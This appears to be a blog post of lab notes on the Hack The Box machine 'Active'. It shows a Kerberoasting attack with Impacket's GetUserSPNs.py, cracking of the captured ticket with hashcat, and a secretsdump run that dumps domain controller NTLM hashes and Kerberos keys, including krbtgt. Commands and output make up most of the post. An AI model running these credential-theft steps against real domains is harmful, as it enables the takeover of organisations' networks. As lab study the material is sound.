Kerberos


Good Link - https://room362.com/post/2016/kerberoast-pt2/

Here we use an authenticated user with limited user access to obtain the Kerberos Ticket
Request all of the user SPN tickets and they are output in John the Ripper format

GetUserSPNs.py -request ACTIVE.htb/SVC_TGS:GPPstillStandingStrong2k18

Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon          
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 20:06:40  2018-07-30 18:17:40



$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$e707c675c1ba43ae
---snipe---

---snipe---




We can now crack this with hashcat

/opt/hashcat/hashcat -a 0 -m 13100 keberos-ticket.txt -w 3 rockyou.txt


===========================================

We can also dump out the Hashes now we have obtained Administrative access

we do this using impackets secretdump.


root@kali# impacket-secretsdump  -just-dc ACTIVE.htb/Administrator@10.10.10.100 -use-vss
 
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

Password:
[*] Target system bootKey: 0xff954ee81ffb63937b563f523caf1d59
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: ed534631c56761ebb03df2c7bbc18b12
[*] Reading and decrypting hashes from \\10.10.10.100\ADMIN$\Temp\jVykSHdL.tmp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:af19ec65874cc2b8090cde7d8f4152ca:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
[*] Kerberos keys from \\10.10.10.100\ADMIN$\Temp\jVykSHdL.tmp
Administrator:aes256-cts-hmac-sha1-96:003b207686cfdbee91ff9f5671aa10c5d940137da387173507b7ff00648b40d8
Administrator:aes128-cts-hmac-sha1-96:48347871a9f7c5346c356d76313668fe
Administrator:des-cbc-md5:5891549b31f2c294
DC$:aes256-cts-hmac-sha1-96:831c7121df34c61f71b1e4dccd1f27f43c93742d556906f6952eaa40cb768625
DC$:aes128-cts-hmac-sha1-96:e580dfb4a0df0665bb49ae2918daf235
DC$:des-cbc-md5:02861ca1a71907a1
krbtgt:aes256-cts-hmac-sha1-96:cd80d318efb2f8752767cd619731b6705cf59df462900fb37310b662c9cf51e9
krbtgt:aes128-cts-hmac-sha1-96:b9a02d7bd319781bc1e0a890f69304c3
krbtgt:des-cbc-md5:9d044f891adf7629
active.htb\SVC_TGS:aes256-cts-hmac-sha1-96:d59943174b17c1a4ced88cc24855ef242ad328201126d296bb66aa9588e19b4a
active.htb\SVC_TGS:aes128-cts-hmac-sha1-96:f03559334c1111d6f792d74a453d6f31
active.htb\SVC_TGS:des-cbc-md5:d6c7eca70862f1d0
[*] Cleaning up...

No comments:

Post a Comment

Subscribe to: Posts (Atom)